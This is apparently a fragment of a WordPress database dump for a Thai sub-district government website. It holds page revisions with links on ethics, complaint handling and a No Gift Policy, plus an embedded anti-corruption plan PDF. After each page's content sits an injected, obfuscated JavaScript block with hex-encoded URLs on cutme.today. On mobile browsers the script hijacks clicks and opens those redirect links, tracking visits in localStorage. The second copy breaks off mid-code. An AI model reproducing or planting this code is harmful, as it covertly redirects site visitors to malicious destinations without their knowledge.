data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม  No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 19:51:01','2024-08-20 12:51:01','',871,'http://pakhaeng.ssk.in.th/?p=1009',0,'revision','',0),
(1010,1,'2024-08-20 20:04:25','2024-08-20 13:04:25','<!-- wp:file {\"id\":1011,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนการปฏิบัติการป้องกันการทุจริต\"></object><a id=\"wp-block-file--media-0b7a4c7d-36a3-486b-945f-2598993b26cd\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\">แผนการปฏิบัติการป้องกันการทุจริต</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0b7a4c7d-36a3-486b-945f-2598993b26cd\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 